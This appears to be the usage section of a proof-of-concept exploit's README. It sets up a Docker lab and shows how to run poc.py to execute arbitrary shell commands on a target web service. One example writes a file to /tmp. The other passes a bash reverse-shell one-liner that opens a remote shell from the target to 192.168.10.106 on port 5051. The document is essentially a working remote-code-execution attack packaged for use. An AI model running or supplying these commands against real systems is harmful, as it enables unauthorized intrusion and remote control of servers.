docker-compose up -d
python3 poc.py "URL" "shell"
Example(PoC):
python3 poc.py http://127.0.0.1:8080 "touch /tmp/1234"
Example(PoC)-2_Reverse Shell:
python3 poc.py http://127.0.0.1:8080 "0<&196;exec 196<>/dev/tcp/192.168.10.106/5051; sh <&196 >&196 2>&196"